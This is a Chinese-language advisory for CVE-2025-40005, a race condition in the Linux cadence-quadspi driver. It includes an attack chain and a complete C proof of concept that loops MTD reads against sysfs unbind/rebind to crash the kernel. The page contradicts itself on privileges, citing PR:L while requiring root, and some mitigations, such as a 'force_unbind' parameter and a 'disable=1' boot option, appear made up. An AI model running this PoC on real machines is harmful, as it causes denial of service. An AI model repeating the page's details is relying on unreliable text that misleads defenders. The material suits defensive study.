CVE-2025-40005 Linux内核cadence-quadspi驱动解绑竞态漏洞

漏洞信息

漏洞编号

CVE-2025-40005

漏洞类型

竞态条件/释放后使用(UAF)

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel spi-cadence-quadspi驱动

漏洞概述

CVE-2025-40005是Linux内核中spi-cadence-quadspi（Cadence四线SPI控制器）驱动存在的一个竞态条件漏洞。该漏洞源于驱动程序在处理间接读取（indirect read）和间接写入（indirect write）操作时，假设不会发生强制设备移除（unbind）操作，但实际上root超级用户仍然可以执行强制设备移除操作。当驱动程序正在进行间接读写操作时，如果用户强制解绑驱动，会导致内核崩溃。

该漏洞的根本原因是驱动程序缺少对附加到控制器的设备进行引用计数（refcount）管理的机制。在没有引用计数保护的情况下，驱动无法优雅地等待附加设备的移除操作完成后再继续执行移除流程，从而在并发操作中触发了对已释放资源的访问，造成内核崩溃。

该漏洞的CVSS评分为5.5，属于中危级别。攻击者需要具有本地低权限访问能力（PR:L），无需用户交互（UI:N），攻击向量为本地（AV:L），利用复杂度低（AC:L）。一旦成功利用，将导致系统可用性完全丧失（机密性影响低、完整性无影响、可用性影响高），表现为内核崩溃（kernel panic）或系统挂起。

技术细节

该漏洞位于Linux内核的spi-cadence-quadspi驱动中，主要涉及驱动绑定/解绑（bind/unbind）与数据传输操作之间的竞态条件。

**漏洞原理：**
cadence-quadspi驱动支持间接读取和间接写入操作，这些操作通过DMA或内存映射方式与SPI设备进行数据交互。在原始实现中，驱动假设在数据传输操作进行期间不会发生强制设备移除操作，因此没有对控制器附加的设备实施引用计数保护。

当root用户执行强制解绑操作（如通过sysfs的'unbind'接口或echo操作）时，驱动的remove回调会被调用，同时可能还有正在进行的间接读写操作。这两个路径并发执行，导致：
1. remove回调释放了驱动相关的资源（包括DMA通道、内存映射等）
2. 同时进行的数据传输操作访问了已被释放的资源
3. 最终触发内核空指针解引用或use-after-free，导致内核崩溃

**利用方式：**
1. 攻击者需要本地root权限才能执行强制设备解绑操作
2. 利用流程包括：触发SPI间接读写操作（可通过访问挂载在该SPI控制器上的存储设备如NOR Flash），在操作进行期间同时执行设备解绑
3. 竞态窗口虽然较小，但可以通过循环触发来提高成功率

**修复方案：**
通过实现引用计数（refcount）机制来跟踪附加到控制器的设备数量。在remove操作中，优雅地等待所有附加设备的移除操作完成后再继续执行清理流程，确保数据传输操作和设备移除操作之间的同步。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者需要获取目标系统的本地root权限或具有CAP_SYS_ADMIN能力的低权限账户，因为强制设备解绑操作需要root权限。

STEP 2

步骤2：识别QSPI控制器

攻击者识别系统中存在的Cadence QSPI控制器设备，通常出现在嵌入式系统或SoC平台上，可通过/sys/bus/platform/drivers/cdns-qspi查看。

STEP 3

步骤3：触发间接读写操作

通过访问挂载在QSPI控制器上的MTD设备（如/dev/mtd0）或文件系统，触发SPI驱动的间接读取或写入操作。

STEP 4

步骤4：并发执行驱动解绑

在数据传输操作进行期间，通过sysfs的unbind接口强制解绑cdns-qspi驱动，与数据传输形成竞态条件。

STEP 5

步骤5：触发内核崩溃

竞态条件导致use-after-free或空指针解引用，触发内核oops或panic，造成系统拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-40005 PoC - Trigger kernel crash via race condition
// between SPI indirect read/write and driver unbind

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <pthread.h>
#include <sys/ioctl.h>
#include <errno.h>

// SPI device path for cadence-quadspi controller
#define QSPI_DEVICE "/dev/mtd0"  // MTD device backed by QSPI NOR flash
#define QSPI_DRIVER_PATH "/sys/bus/platform/drivers/cdns-qspi"
#define QSPI_DEVICE_BIND "1f040000.spi"

// Thread function to continuously read from QSPI device
void *read_thread(void *arg) {
    int fd;
    char buf[4096];
    
    while (1) {
        fd = open(QSPI_DEVICE, O_RDONLY);
        if (fd >= 0) {
            // Perform continuous reads to trigger indirect read operations
            lseek(fd, 0, SEEK_SET);
            read(fd, buf, sizeof(buf));
            close(fd);
        }
        usleep(100);  // Small delay to increase race window
    }
    return NULL;
}

// Thread function to unbind the QSPI driver
void *unbind_thread(void *arg) {
    int fd;
    char path[256];
    
    snprintf(path, sizeof(path), "%s/unbind", QSPI_DRIVER_PATH);
    
    while (1) {
        fd = open(path, O_WRONLY);
        if (fd >= 0) {
            write(fd, QSPI_DEVICE_BIND, strlen(QSPI_DEVICE_BIND));
            close(fd);
        }
        
        // Rebind for next iteration
        usleep(1000);
        snprintf(path, sizeof(path), "%s/bind", QSPI_DRIVER_PATH);
        fd = open(path, O_WRONLY);
        if (fd >= 0) {
            write(fd, QSPI_DEVICE_BIND, strlen(QSPI_DEVICE_BIND));
            close(fd);
        }
        usleep(1000);
    }
    return NULL;
}

int main(int argc, char *argv[]) {
    pthread_t t1, t2;
    
    printf("CVE-2025-40005 PoC - requires root privileges\n");
    
    if (geteuid() != 0) {
        fprintf(stderr, "Error: This PoC requires root privileges\n");
        return 1;
    }
    
    // Create threads to trigger race condition
    pthread_create(&t1, NULL, read_thread, NULL);
    pthread_create(&t2, NULL, unbind_thread, NULL);
    
    // Wait for kernel crash
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    
    return 0;
}

影响范围

Linux Kernel < 6.6 (包含spi-cadence-quadspi驱动的版本)

Linux Kernel 6.6.x (未应用补丁的版本)

Linux Kernel 6.12.x (未应用补丁的版本)

Linux Kernel stable分支 (commit 56787f4a75907ae99b5f5842b756fa68e2482f6d之前的版本)

防御指南

临时缓解措施

在无法立即升级内核的情况下，可以通过以下临时措施缓解风险：1）限制只有受信任的管理员才能访问系统，避免低权限用户获得root权限；2）通过修改sysfs权限或使用udev规则限制对cdns-qspi驱动bind/unbind接口的访问；3）在关键生产环境中禁用module参数中的force_unbind功能；4）监控并审计对/sys/bus/platform/drivers/cdns-qspi/unbind的访问尝试；5）考虑在引导参数中添加spi_cadence_qspi.disable=1来禁用该驱动（如果系统不依赖QSPI存储设备）。